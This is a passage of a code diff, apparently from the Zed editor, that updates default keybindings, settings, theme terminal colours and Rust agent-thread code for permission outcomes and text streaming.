"ctrl-q": "zed::Quit",
"f4": "debugger::Start",
@@ -226,8 +225,8 @@
"context": "ContextEditor > Editor",
"bindings": {
"ctrl-enter": "assistant::Assist",
- "ctrl-s": "workspace::Save",
"save": "workspace::Save",
+ "ctrl-s": "workspace::Save",
"ctrl-<": "assistant::InsertIntoEditor",
"shift-enter": "assistant::Split",
"ctrl-r": "assistant::CycleMessageRole",
@@ -258,7 +257,7 @@
"ctrl-shift-j": "agent::ToggleNavigationMenu",
"ctrl-alt-i": "agent::ToggleOptionsMenu",
"ctrl-alt-shift-n": "agent::ToggleNewThreadMenu",
- "ctrl-alt-shift-t": "agent::ToggleStartThreadInSelector",
+ "ctrl-shift-t": "agent::CycleStartThreadIn",
"shift-alt-escape": "agent::ExpandMessageEditor",
"ctrl->": "agent::AddSelectionToThread",
"ctrl-shift-e": "project_panel::ToggleFocus",
@@ -391,6 +390,14 @@
"ctrl-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "BufferSearchBar && !in_replace > Editor",
+ "use_key_equivalents": true,
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ "shift-enter": "search::SelectPreviousMatch",
+ },
+ },
{
"context": "BufferSearchBar && !in_replace > Editor",
"bindings": {
@@ -424,6 +431,12 @@
"ctrl-alt-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "ProjectSearchBar && !in_replace > Editor",
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ },
+ },
{
"context": "ProjectSearchView",
"bindings": {
@@ -624,6 +637,7 @@
"ctrl-shift-t": "pane::ReopenClosedItem",
"ctrl-k ctrl-s": "zed::OpenKeymap",
"ctrl-k ctrl-t": "theme_selector::Toggle",
+ "ctrl-k ctrl-shift-t": "theme::ToggleMode",
"ctrl-alt-super-p": "settings_profile_selector::Toggle",
"ctrl-t": "project_symbols::Toggle",
"ctrl-p": "file_finder::Toggle",
@@ -670,13 +684,17 @@
},
},
{
- "context": "WorkspaceSidebar",
+ "context": "ThreadsSidebar",
"use_key_equivalents": true,
"bindings": {
- "ctrl-n": "multi_workspace::NewWorkspaceInWindow",
- "left": "agents_sidebar::CollapseSelectedEntry",
- "right": "agents_sidebar::ExpandSelectedEntry",
+ "ctrl-n": "agents_sidebar::NewThreadInGroup",
+ "left": "menu::SelectParent",
+ "right": "menu::SelectChild",
"enter": "menu::Confirm",
+ "space": "menu::Confirm",
+ "ctrl-f": "agents_sidebar::FocusSidebarFilter",
+ "ctrl-g": "agents_sidebar::ToggleArchive",
+ "shift-backspace": "agent::RemoveSelectedThread",
},
},
{
@@ -766,18 +784,14 @@
"bindings": {
"alt-tab": "editor::AcceptEditPrediction",
"alt-l": "editor::AcceptEditPrediction",
- "tab": "editor::AcceptEditPrediction",
"alt-k": "editor::AcceptNextWordEditPrediction",
"alt-j": "editor::AcceptNextLineEditPrediction",
},
},
{
- "context": "Editor && edit_prediction_conflict",
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"bindings": {
- "alt-tab": "editor::AcceptEditPrediction",
- "alt-l": "editor::AcceptEditPrediction",
- "alt-k": "editor::AcceptNextWordEditPrediction",
- "alt-j": "editor::AcceptNextLineEditPrediction",
+ "tab": "editor::AcceptEditPrediction",
},
},
{
@@ -895,6 +909,8 @@
"ctrl-alt-c": "project_panel::CopyPath",
"alt-shift-copy": "workspace::CopyRelativePath",
"alt-ctrl-shift-c": "workspace::CopyRelativePath",
+ "undo": "project_panel::Undo",
+ "ctrl-z": "project_panel::Undo",
"enter": "project_panel::Rename",
"f2": "project_panel::Rename",
"backspace": ["project_panel::Trash", { "skip_prompt": false }],
@@ -1232,6 +1248,8 @@
"down": "markdown::ScrollDown",
"alt-up": "markdown::ScrollUpByItem",
"alt-down": "markdown::ScrollDownByItem",
+ "ctrl-home": "markdown::ScrollToTop",
+ "ctrl-end": "markdown::ScrollToBottom",
},
},
{
@@ -1320,6 +1338,15 @@
"ctrl-shift-backspace": "git::DeleteWorktree",
},
},
+ {
+ // Handled under a more specific context to avoid conflicts with the
+ // `OpenCurrentFile` keybind from the settings UI
+ "context": "!SettingsWindow",
+ "use_key_equivalents": true,
+ "bindings": {
+ "ctrl-,": "zed::OpenSettings",
+ }
+ },
{
"context": "SettingsWindow",
"use_key_equivalents": true,
@@ -1437,8 +1464,8 @@
{
"context": "GitPicker",
"bindings": {
- "alt-1": "git_picker::ActivateBranchesTab",
- "alt-2": "git_picker::ActivateWorktreesTab",
+ "alt-1": "git_picker::ActivateWorktreesTab",
+ "alt-2": "git_picker::ActivateBranchesTab",
"alt-3": "git_picker::ActivateStashTab",
},
},
@@ -39,7 +39,6 @@
"cmd-+": ["zed::IncreaseBufferFontSize", { "persist": false }],
"cmd--": ["zed::DecreaseBufferFontSize", { "persist": false }],
"cmd-0": ["zed::ResetBufferFontSize", { "persist": false }],
- "cmd-,": "zed::OpenSettings",
"cmd-alt-,": "zed::OpenSettingsFile",
"cmd-q": "zed::Quit",
"cmd-h": "zed::Hide",
@@ -297,7 +296,7 @@
"cmd-shift-j": "agent::ToggleNavigationMenu",
"cmd-alt-m": "agent::ToggleOptionsMenu",
"cmd-alt-shift-n": "agent::ToggleNewThreadMenu",
- "cmd-alt-shift-t": "agent::ToggleStartThreadInSelector",
+ "cmd-shift-t": "agent::CycleStartThreadIn",
"shift-alt-escape": "agent::ExpandMessageEditor",
"cmd->": "agent::AddSelectionToThread",
"cmd-shift-e": "project_panel::ToggleFocus",
@@ -446,6 +445,13 @@
{
"context": "BufferSearchBar && !in_replace > Editor",
"use_key_equivalents": true,
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ "shift-enter": "search::SelectPreviousMatch",
+ },
+ },
+ {
+ "context": "BufferSearchBar && !in_replace > Editor",
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -473,7 +479,6 @@
},
{
"context": "ProjectSearchBar > Editor",
- "use_key_equivalents": true,
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -487,6 +492,12 @@
"cmd-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "ProjectSearchBar && !in_replace > Editor",
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ },
+ },
{
"context": "ProjectSearchView",
"use_key_equivalents": true,
@@ -691,6 +702,7 @@
"cmd-shift-t": "pane::ReopenClosedItem",
"cmd-k cmd-s": "zed::OpenKeymap",
"cmd-k cmd-t": "theme_selector::Toggle",
+ "cmd-k cmd-shift-t": "theme::ToggleMode",
"ctrl-alt-cmd-p": "settings_profile_selector::Toggle",
"cmd-t": "project_symbols::Toggle",
"cmd-p": "file_finder::Toggle",
@@ -738,13 +750,17 @@
},
},
{
- "context": "WorkspaceSidebar",
+ "context": "ThreadsSidebar",
"use_key_equivalents": true,
"bindings": {
- "cmd-n": "multi_workspace::NewWorkspaceInWindow",
- "left": "agents_sidebar::CollapseSelectedEntry",
- "right": "agents_sidebar::ExpandSelectedEntry",
+ "cmd-n": "agents_sidebar::NewThreadInGroup",
+ "left": "menu::SelectParent",
+ "right": "menu::SelectChild",
"enter": "menu::Confirm",
+ "space": "menu::Confirm",
+ "cmd-f": "agents_sidebar::FocusSidebarFilter",
+ "cmd-g": "agents_sidebar::ToggleArchive",
+ "shift-backspace": "agent::RemoveSelectedThread",
},
},
{
@@ -830,18 +846,14 @@
"context": "Editor && edit_prediction",
"bindings": {
"alt-tab": "editor::AcceptEditPrediction",
- "tab": "editor::AcceptEditPrediction",
"ctrl-cmd-right": "editor::AcceptNextWordEditPrediction",
"ctrl-cmd-down": "editor::AcceptNextLineEditPrediction",
},
},
{
- "context": "Editor && edit_prediction_conflict",
- "use_key_equivalents": true,
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"bindings": {
- "alt-tab": "editor::AcceptEditPrediction",
- "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction",
- "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction",
+ "tab": "editor::AcceptEditPrediction",
},
},
{
@@ -956,6 +968,7 @@
"cmd-v": "project_panel::Paste",
"cmd-alt-c": "workspace::CopyPath",
"alt-cmd-shift-c": "workspace::CopyRelativePath",
+ "cmd-z": "project_panel::Undo",
"enter": "project_panel::Rename",
"f2": "project_panel::Rename",
"backspace": ["project_panel::Trash", { "skip_prompt": false }],
@@ -1338,6 +1351,8 @@
"down": "markdown::ScrollDown",
"alt-up": "markdown::ScrollUpByItem",
"alt-down": "markdown::ScrollDownByItem",
+ "cmd-up": "markdown::ScrollToTop",
+ "cmd-down": "markdown::ScrollToBottom",
},
},
{
@@ -1425,6 +1440,15 @@
"cmd-shift-backspace": "git::DeleteWorktree",
},
},
+ {
+ // Handled under a more specific context to avoid conflicts with the
+ // `OpenCurrentFile` keybind from the settings UI
+ "context": "!SettingsWindow",
+ "use_key_equivalents": true,
+ "bindings": {
+ "cmd-,": "zed::OpenSettings",
+ }
+ },
{
"context": "SettingsWindow",
"use_key_equivalents": true,
@@ -1515,8 +1539,8 @@
{
"context": "GitPicker",
"bindings": {
- "cmd-1": "git_picker::ActivateBranchesTab",
- "cmd-2": "git_picker::ActivateWorktreesTab",
+ "cmd-1": "git_picker::ActivateWorktreesTab",
+ "cmd-2": "git_picker::ActivateBranchesTab",
"cmd-3": "git_picker::ActivateStashTab",
},
},
@@ -30,7 +30,6 @@
"ctrl-shift-=": ["zed::IncreaseBufferFontSize", { "persist": false }],
"ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }],
"ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }],
- "ctrl-,": "zed::OpenSettings",
"ctrl-alt-,": "zed::OpenSettingsFile",
"ctrl-q": "zed::Quit",
"f4": "debugger::Start",
@@ -259,7 +258,7 @@
"shift-alt-j": "agent::ToggleNavigationMenu",
"shift-alt-i": "agent::ToggleOptionsMenu",
"ctrl-shift-alt-n": "agent::ToggleNewThreadMenu",
- "ctrl-shift-alt-t": "agent::ToggleStartThreadInSelector",
+ "ctrl-shift-t": "agent::CycleStartThreadIn",
"shift-alt-escape": "agent::ExpandMessageEditor",
"ctrl-shift-.": "agent::AddSelectionToThread",
"ctrl-shift-e": "project_panel::ToggleFocus",
@@ -398,6 +397,13 @@
{
"context": "BufferSearchBar && !in_replace > Editor",
"use_key_equivalents": true,
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ "shift-enter": "search::SelectPreviousMatch",
+ },
+ },
+ {
+ "context": "BufferSearchBar && !in_replace > Editor",
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -415,7 +421,6 @@
},
{
"context": "ProjectSearchBar > Editor",
- "use_key_equivalents": true,
"bindings": {
"up": "search::PreviousHistoryQuery",
"down": "search::NextHistoryQuery",
@@ -429,6 +434,12 @@
"ctrl-alt-enter": "search::ReplaceAll",
},
},
+ {
+ "context": "ProjectSearchBar && !in_replace > Editor",
+ "bindings": {
+ "ctrl-enter": "editor::Newline",
+ },
+ },
{
"context": "ProjectSearchView",
"use_key_equivalents": true,
@@ -616,6 +627,7 @@
"ctrl-shift-t": "pane::ReopenClosedItem",
"ctrl-k ctrl-s": "zed::OpenKeymap",
"ctrl-k ctrl-t": "theme_selector::Toggle",
+ "ctrl-k ctrl-shift-t": "theme::ToggleMode",
"ctrl-alt-super-p": "settings_profile_selector::Toggle",
"ctrl-t": "project_symbols::Toggle",
"ctrl-p": "file_finder::Toggle",
@@ -674,13 +686,17 @@
},
},
{
- "context": "WorkspaceSidebar",
+ "context": "ThreadsSidebar",
"use_key_equivalents": true,
"bindings": {
- "ctrl-n": "multi_workspace::NewWorkspaceInWindow",
- "left": "agents_sidebar::CollapseSelectedEntry",
- "right": "agents_sidebar::ExpandSelectedEntry",
+ "ctrl-n": "agents_sidebar::NewThreadInGroup",
+ "left": "menu::SelectParent",
+ "right": "menu::SelectChild",
"enter": "menu::Confirm",
+ "space": "menu::Confirm",
+ "ctrl-f": "agents_sidebar::FocusSidebarFilter",
+ "ctrl-g": "agents_sidebar::ToggleArchive",
+ "shift-backspace": "agent::RemoveSelectedThread",
},
},
{
@@ -762,19 +778,15 @@
"bindings": {
"alt-tab": "editor::AcceptEditPrediction",
"alt-l": "editor::AcceptEditPrediction",
- "tab": "editor::AcceptEditPrediction",
"alt-k": "editor::AcceptNextWordEditPrediction",
"alt-j": "editor::AcceptNextLineEditPrediction",
},
},
{
- "context": "Editor && edit_prediction_conflict",
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"use_key_equivalents": true,
"bindings": {
- "alt-tab": "editor::AcceptEditPrediction",
- "alt-l": "editor::AcceptEditPrediction",
- "alt-k": "editor::AcceptNextWordEditPrediction",
- "alt-j": "editor::AcceptNextLineEditPrediction",
+ "tab": "editor::AcceptEditPrediction",
},
},
{
@@ -893,6 +905,7 @@
"ctrl-v": "project_panel::Paste",
"shift-alt-c": "project_panel::CopyPath",
"ctrl-k ctrl-shift-c": "workspace::CopyRelativePath",
+ "ctrl-z": "project_panel::Undo",
"enter": "project_panel::Rename",
"f2": "project_panel::Rename",
"backspace": ["project_panel::Trash", { "skip_prompt": false }],
@@ -1261,6 +1274,8 @@
"down": "markdown::ScrollDown",
"alt-up": "markdown::ScrollUpByItem",
"alt-down": "markdown::ScrollDownByItem",
+ "ctrl-home": "markdown::ScrollToTop",
+ "ctrl-end": "markdown::ScrollToBottom",
},
},
{
@@ -1341,6 +1356,15 @@
"ctrl-shift-backspace": "git::DeleteWorktree",
},
},
+ {
+ // Handled under a more specific context to avoid conflicts with the
+ // `OpenCurrentFile` keybind from the settings UI
+ "context": "!SettingsWindow",
+ "use_key_equivalents": true,
+ "bindings": {
+ "ctrl-,": "zed::OpenSettings",
+ }
+ },
{
"context": "SettingsWindow",
"use_key_equivalents": true,
@@ -1430,8 +1454,8 @@
{
"context": "GitPicker",
"bindings": {
- "alt-1": "git_picker::ActivateBranchesTab",
- "alt-2": "git_picker::ActivateWorktreesTab",
+ "alt-1": "git_picker::ActivateWorktreesTab",
+ "alt-2": "git_picker::ActivateBranchesTab",
"alt-3": "git_picker::ActivateStashTab",
},
},
@@ -33,6 +33,7 @@
"cmd-+": "editor::UnfoldLines",
"alt-shift-g": "editor::SplitSelectionIntoLines",
"ctrl-g": ["editor::SelectNext", { "replace_newest": false }],
+ "ctrl-shift-g": "editor::UndoSelection",
"ctrl-cmd-g": ["editor::SelectPrevious", { "replace_newest": false }],
"cmd-/": ["editor::ToggleComments", { "advance_downwards": true }],
"alt-up": "editor::SelectLargerSyntaxNode",
@@ -427,6 +427,7 @@
"escape": "vim::SwitchToHelixNormalMode",
"i": "vim::HelixInsert",
"a": "vim::HelixAppend",
+ "shift-a": "vim::HelixInsertEndOfLine",
"ctrl-[": "editor::Cancel",
},
},
@@ -510,8 +511,8 @@
"g shift-u": "git::UnstageAndNext", // Zed specific
// Window mode
- "space w v": "pane::SplitDown",
- "space w s": "pane::SplitRight",
+ "space w v": "pane::SplitRight",
+ "space w s": "pane::SplitDown",
"space w h": "workspace::ActivatePaneLeft",
"space w j": "workspace::ActivatePaneDown",
"space w k": "workspace::ActivatePaneUp",
@@ -1059,7 +1060,7 @@
},
},
{
- "context": "Editor && edit_prediction",
+ "context": "Editor && edit_prediction && edit_prediction_mode == eager",
"bindings": {
// This is identical to the binding in the base keymap, but the vim bindings above to
// "vim::Tab" shadow it, so it needs to be bound again.
@@ -1072,15 +1073,7 @@
"enter": "agent::Chat",
},
},
- {
- "context": "os != macos && Editor && edit_prediction_conflict",
- "bindings": {
- // alt-l is provided as an alternative to tab/alt-tab. and will be displayed in the UI. This
- // is because alt-tab may not be available, as it is often used for window switching on Linux
- // and Windows.
- "alt-l": "editor::AcceptEditPrediction",
- },
- },
+
{
"context": "SettingsWindow > NavigationMenu && !search",
"bindings": {
@@ -1099,6 +1092,8 @@
"ctrl-d": "markdown::ScrollPageDown",
"ctrl-y": "markdown::ScrollUp",
"ctrl-e": "markdown::ScrollDown",
+ "g g": "markdown::ScrollToTop",
+ "shift-g": "markdown::ScrollToBottom",
},
},
{
@@ -1118,4 +1113,31 @@
"k": "notebook::NotebookMoveUp",
},
},
+ {
+ "context": "ThreadsSidebar && !Editor",
+ "bindings": {
+ "j": "menu::SelectNext",
+ "k": "menu::SelectPrevious",
+ "h": "menu::SelectParent",
+ "l": "menu::SelectChild",
+ "g g": "menu::SelectFirst",
+ "shift-g": "menu::SelectLast",
+ "/": "agents_sidebar::FocusSidebarFilter",
+ "z a": "editor::ToggleFold",
+ "z c": "menu::SelectParent",
+ "z o": "menu::SelectChild",
+ "z shift-m": "editor::FoldAll",
+ "z shift-r": "editor::UnfoldAll",
+ },
+ },
+ {
+ "context": "ThreadsSidebar > Editor && VimControl && vim_mode == normal",
+ "bindings": {
+ "j": "editor::MoveDown",
+ "k": "editor::MoveUp",
+ "/": "vim::SwitchToInsertMode",
+ "escape": "menu::Cancel",
+ "enter": "editor::Newline",
+ },
+ },
]
@@ -460,12 +460,10 @@
"show_sign_in": true,
// Whether to show the menus in the titlebar.
"show_menus": false,
+ // The layout of window control buttons in the title bar (Linux only).
+ "button_layout": "platform_default",
},
"audio": {
- // Opt into the new audio system.
- "experimental.rodio_audio": false,
- // Requires 'rodio_audio: true'
- //
// Automatically increase or decrease you microphone's volume. This affects how
// loud you sound to others.
//
@@ -474,33 +472,10 @@
// audio and has auto speaker volume on this will make you very loud
// compared to other speakers.
"experimental.auto_microphone_volume": false,
- // Requires 'rodio_audio: true'
- //
- // Automatically increate or decrease the volume of other call members.
- // This only affects how things sound for you.
- "experimental.auto_speaker_volume": true,
- // Requires 'rodio_audio: true'
- //
- // Remove background noises. Works great for typing, cars, dogs, AC. Does
- // not work well on music.
- "experimental.denoise": true,
- // Requires 'rodio_audio: true'
- //
- // Use audio parameters compatible with the previous versions of
- // experimental audio and non-experimental audio. When this is false you
- // will sound strange to anyone not on the latest experimental audio. In
- // the future we will migrate by setting this to false
- //
- // You need to rejoin a call for this setting to apply
- "experimental.legacy_audio_compatible": true,
- // Requires 'rodio_audio: true'
- //
// Select specific output audio device.
// `null` means use system default.
// Any unrecognized output device will fall back to system default.
"experimental.output_audio_device": null,
- // Requires 'rodio_audio: true'
- //
// Select specific input audio device.
// `null` means use system default.
// Any unrecognized input device will fall back to system default.
@@ -768,6 +743,9 @@
// 5. Never show the scrollbar:
// "never"
"show": null,
+ // Whether to allow horizontal scrolling in the project panel.
+ // When false, the view is locked to the leftmost position and long file names are clipped.
+ "horizontal_scroll": true,
},
// Which files containing diagnostic errors/warnings to mark in the project panel.
// This setting can take the following three values:
@@ -895,6 +873,14 @@
// Choices: label_color, icon
// Default: icon
"status_style": "icon",
+ // Whether to show file icons in the git panel.
+ //
+ // Default: false
+ "file_icons": false,
+ // Whether to show folder icons or chevrons for directories in the git panel.
+ //
+ // Default: true
+ "folder_icons": true,
// What branch name to use if `init.defaultBranch` is not set
//
// Default: main
@@ -911,6 +897,14 @@
///
/// Default: false
"tree_view": false,
+ // Whether the git panel should open on startup.
+ //
+ // Default: false
+ "starts_open": false,
+ // Whether to show a badge on the git panel icon with the count of uncommitted changes.
+ //
+ // Default: false
+ "show_count_badge": false,
"scrollbar": {
// When to show the scrollbar in the git panel.
//
@@ -920,8 +914,8 @@
},
// Whether to show the addition/deletion change count next to each file in the Git panel.
//
- // Default: false
- "diff_stats": false,
+ // Default: true
+ "diff_stats": true,
},
"message_editor": {
// Whether to automatically replace emoji shortcodes with emoji characters.
@@ -935,6 +929,8 @@
"dock": "right",
// Default width of the notification panel.
"default_width": 380,
+ // Whether to show a badge on the notification panel icon with the count of unread notifications.
+ "show_count_badge": false,
},
"agent": {
// Whether the inline assistant should use streaming tools, when available
@@ -1052,6 +1048,7 @@
"spawn_agent": true,
"terminal": true,
"thinking": true,
+ "update_plan": true,
"web_search": true,
},
},
@@ -1071,6 +1068,7 @@
"grep": true,
"spawn_agent": true,
"thinking": true,
+ "update_plan": true,
"web_search": true,
},
},
@@ -1080,6 +1078,10 @@
"tools": {},
},
},
+ // Whether to start a new thread in the current local project or in a new Git worktree.
+ //
+ // Default: local_project
+ "new_thread_location": "local_project",
// Where to show notifications when the agent has either completed
// its response, or else needs confirmation before it can run a
// tool action.
@@ -1282,6 +1284,8 @@
// * "indexed": Use only the files Zed had indexed
// * "smart": Be smart and search for ignored when called from a gitignored worktree
"include_ignored": "smart",
+ // Whether to include text channels in file finder results.
+ "include_channels": false,
},
// Whether or not to remove any trailing whitespace from lines of a buffer
// before saving it.
@@ -1850,6 +1854,8 @@
// Timeout for hover and Cmd-click path hyperlink discovery in milliseconds. Specifying a
// timeout of `0` will disable path hyperlinking in terminal.
"path_hyperlink_timeout_ms": 1,
+ // Whether to show a badge on the terminal panel icon with the count of open terminals.
+ "show_count_badge": false,
},
"code_actions_on_format": {},
// Settings related to running tasks.
@@ -2143,7 +2149,7 @@
},
},
"Starlark": {
- "language_servers": ["starpls", "!buck2-lsp", "..."],
+ "language_servers": ["starpls", "!buck2-lsp", "!tilt", "..."],
},
"Svelte": {
"language_servers": ["svelte-language-server", "..."],
@@ -2214,6 +2220,9 @@
"api_url": "https://api.openai.com/v1",
},
"openai_compatible": {},
+ "opencode": {
+ "api_url": "https://opencode.ai/zen",
+ },
"open_router": {
"api_url": "https://openrouter.ai/api/v1",
},
@@ -119,6 +119,16 @@
"style": ["type"],
},
// References
+ {
+ "token_type": "parameter",
+ "token_modifiers": ["declaration"],
+ "style": ["variable.parameter"]
+ },
+ {
+ "token_type": "parameter",
+ "token_modifiers": ["definition"],
+ "style": ["variable.parameter"]
+ },
{
"token_type": "parameter",
"token_modifiers": [],
@@ -201,6 +211,11 @@
"token_modifiers": [],
"style": ["comment"],
},
+ {
+ "token_type": "string",
+ "token_modifiers": ["documentation"],
+ "style": ["string.doc"],
+ },
{
"token_type": "string",
"token_modifiers": [],
@@ -48,6 +48,11 @@
"show_summary": true,
// Whether to show the command line in the output of the spawned task, defaults to `true`.
"show_command": true,
+ // Which edited buffers to save before running the task:
+ // * `all` — save all edited buffers
+ // * `current` — save current buffer only
+ // * `none` — don't save any buffers
+ "save": "all",
// Represents the tags for inline runnable indicators, or spawning multiple tasks at once.
// "tags": []
},
@@ -71,31 +71,31 @@
"terminal.background": "#0d1016ff",
"terminal.foreground": "#bfbdb6ff",
"terminal.bright_foreground": "#bfbdb6ff",
- "terminal.dim_foreground": "#0d1016ff",
+ "terminal.dim_foreground": "#85847fff",
"terminal.ansi.black": "#0d1016ff",
"terminal.ansi.bright_black": "#545557ff",
- "terminal.ansi.dim_black": "#bfbdb6ff",
+ "terminal.ansi.dim_black": "#3a3b3cff",
"terminal.ansi.red": "#ef7177ff",
"terminal.ansi.bright_red": "#83353bff",
- "terminal.ansi.dim_red": "#febab9ff",
+ "terminal.ansi.dim_red": "#a74f53ff",
"terminal.ansi.green": "#aad84cff",
"terminal.ansi.bright_green": "#567627ff",
- "terminal.ansi.dim_green": "#d8eca8ff",
+ "terminal.ansi.dim_green": "#769735ff",
"terminal.ansi.yellow": "#feb454ff",
"terminal.ansi.bright_yellow": "#92582bff",
- "terminal.ansi.dim_yellow": "#ffd9aaff",
+ "terminal.ansi.dim_yellow": "#b17d3aff",
"terminal.ansi.blue": "#5ac1feff",
"terminal.ansi.bright_blue": "#27618cff",
- "terminal.ansi.dim_blue": "#b7dffeff",
+ "terminal.ansi.dim_blue": "#3e87b1ff",
"terminal.ansi.magenta": "#39bae5ff",
"terminal.ansi.bright_magenta": "#205a78ff",
- "terminal.ansi.dim_magenta": "#addcf3ff",
+ "terminal.ansi.dim_magenta": "#2782a0ff",
"terminal.ansi.cyan": "#95e5cbff",
"terminal.ansi.bright_cyan": "#4c806fff",
- "terminal.ansi.dim_cyan": "#cbf2e4ff",
+ "terminal.ansi.dim_cyan": "#68a08eff",
"terminal.ansi.white": "#bfbdb6ff",
"terminal.ansi.bright_white": "#fafafaff",
- "terminal.ansi.dim_white": "#787876ff",
+ "terminal.ansi.dim_white": "#85847fff",
"link_text.hover": "#5ac1feff",
"conflict": "#feb454ff",
"conflict.background": "#572815ff",
@@ -855,31 +855,31 @@
"terminal.background": "#242835ff",
"terminal.foreground": "#cccac2ff",
"terminal.bright_foreground": "#cccac2ff",
- "terminal.dim_foreground": "#242835ff",
+ "terminal.dim_foreground": "#8e8d87ff",
"terminal.ansi.black": "#242835ff",
"terminal.ansi.bright_black": "#67696eff",
- "terminal.ansi.dim_black": "#cccac2ff",
+ "terminal.ansi.dim_black": "#48494dff",
"terminal.ansi.red": "#f18779ff",
"terminal.ansi.bright_red": "#833f3cff",
- "terminal.ansi.dim_red": "#fec4baff",
+ "terminal.ansi.dim_red": "#a85e54ff",
"terminal.ansi.green": "#d5fe80ff",
"terminal.ansi.bright_green": "#75993cff",
- "terminal.ansi.dim_green": "#ecffc1ff",
+ "terminal.ansi.dim_green": "#95b159ff",
"terminal.ansi.yellow": "#fecf72ff",
"terminal.ansi.bright_yellow": "#937237ff",
- "terminal.ansi.dim_yellow": "#ffe7b9ff",
+ "terminal.ansi.dim_yellow": "#b1904fff",
"terminal.ansi.blue": "#72cffeff",
"terminal.ansi.bright_blue": "#336d8dff",
- "terminal.ansi.dim_blue": "#c1e7ffff",
+ "terminal.ansi.dim_blue": "#4f90b1ff",
"terminal.ansi.magenta": "#5bcde5ff",
"terminal.ansi.bright_magenta": "#2b6c7bff",
- "terminal.ansi.dim_magenta": "#b7e7f2ff",
+ "terminal.ansi.dim_magenta": "#3f8fa0ff",
"terminal.ansi.cyan": "#95e5cbff",
"terminal.ansi.bright_cyan": "#4c806fff",
- "terminal.ansi.dim_cyan": "#cbf2e4ff",
+ "terminal.ansi.dim_cyan": "#68a08eff",
"terminal.ansi.white": "#cccac2ff",
"terminal.ansi.bright_white": "#fafafaff",
- "terminal.ansi.dim_white": "#898a8aff",
+ "terminal.ansi.dim_white": "#8e8d87ff",
"link_text.hover": "#72cffeff",
"conflict": "#fecf72ff",
"conflict.background": "#574018ff",
@@ -31,6 +31,8 @@ use task::{Shell, ShellBuilder};
pub use terminal::*;
use text::Bias;
use ui::App;
+use util::markdown::MarkdownEscaped;
+use util::path_list::PathList;
use util::{ResultExt, get_default_system_shell_preferring_bash, paths::PathStyle};
use uuid::Uuid;
@@ -245,6 +247,8 @@ impl ToolCall {
) -> Result<Self> {
let title = if tool_call.kind == acp::ToolKind::Execute {
tool_call.title
+ } else if tool_call.kind == acp::ToolKind::Edit {
+ MarkdownEscaped(tool_call.title.as_str()).to_string()
} else if let Some((first_line, _)) = tool_call.title.split_once("\n") {
first_line.to_owned() + "…"
} else {
@@ -333,6 +337,8 @@ impl ToolCall {
self.label.update(cx, |label, cx| {
if self.kind == acp::ToolKind::Execute {
label.replace(title, cx);
+ } else if self.kind == acp::ToolKind::Edit {
+ label.replace(MarkdownEscaped(&title).to_string(), cx)
} else if let Some((first_line, _)) = title.split_once("\n") {
label.replace(first_line.to_owned() + "…", cx);
} else {
@@ -488,6 +494,54 @@ impl From<&ResolvedLocation> for AgentLocation {
}
}
+#[derive(Debug, Clone)]
+pub enum SelectedPermissionParams {
+ Terminal { patterns: Vec<String> },
+}
+
+#[derive(Debug)]
+pub struct SelectedPermissionOutcome {
+ pub option_id: acp::PermissionOptionId,
+ pub option_kind: acp::PermissionOptionKind,
+ pub params: Option<SelectedPermissionParams>,
+}
+
+impl SelectedPermissionOutcome {
+ pub fn new(option_id: acp::PermissionOptionId, option_kind: acp::PermissionOptionKind) -> Self {
+ Self {
+ option_id,
+ option_kind,
+ params: None,
+ }
+ }
+
+ pub fn params(mut self, params: Option<SelectedPermissionParams>) -> Self {
+ self.params = params;
+ self
+ }
+}
+
+impl From<SelectedPermissionOutcome> for acp::SelectedPermissionOutcome {
+ fn from(value: SelectedPermissionOutcome) -> Self {
+ Self::new(value.option_id)
+ }
+}
+
+#[derive(Debug)]
+pub enum RequestPermissionOutcome {
+ Cancelled,
+ Selected(SelectedPermissionOutcome),
+}
+
+impl From<RequestPermissionOutcome> for acp::RequestPermissionOutcome {
+ fn from(value: RequestPermissionOutcome) -> Self {
+ match value {
+ RequestPermissionOutcome::Cancelled => Self::Cancelled,
+ RequestPermissionOutcome::Selected(outcome) => Self::Selected(outcome.into()),
+ }
+ }
+}
+
#[derive(Debug)]
pub enum ToolCallStatus {
/// The tool call hasn't started running yet, but we start showing it to
@@ -496,7 +550,7 @@ pub enum ToolCallStatus {
/// The tool call is waiting for confirmation from the user.
WaitingForConfirmation {
options: PermissionOptions,
- respond_tx: oneshot::Sender<acp::PermissionOptionId>,
+ respond_tx: oneshot::Sender<SelectedPermissionOutcome>,
},
/// The tool call is currently running.
InProgress,
@@ -866,6 +920,7 @@ impl Plan {
}
acp::PlanEntryStatus::InProgress => {
stats.in_progress_entry = stats.in_progress_entry.or(Some(entry));
+ stats.pending += 1;
}
acp::PlanEntryStatus::Completed => {
stats.completed += 1;
@@ -953,9 +1008,9 @@ struct RunningTurn {
pub struct AcpThread {
session_id: acp::SessionId,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
parent_session_id: Option<acp::SessionId>,
- title: SharedString,
+ title: Option<SharedString>,
provisional_title: Option<SharedString>,
entries: Vec<AgentThreadEntry>,
plan: Plan,
@@ -976,6 +1031,30 @@ pub struct AcpThread {
draft_prompt: Option<Vec<acp::ContentBlock>>,
/// The initial scroll position for the thread view, set during session registration.
ui_scroll_position: Option<gpui::ListOffset>,
+ /// Buffer for smooth text streaming. Holds text that has been received from
+ /// the model but not yet revealed in the UI. A timer task drains this buffer
+ /// gradually to create a fluid typing effect instead of choppy chunk-at-a-time
+ /// updates.
+ streaming_text_buffer: Option<StreamingTextBuffer>,
+}
+
+struct StreamingTextBuffer {
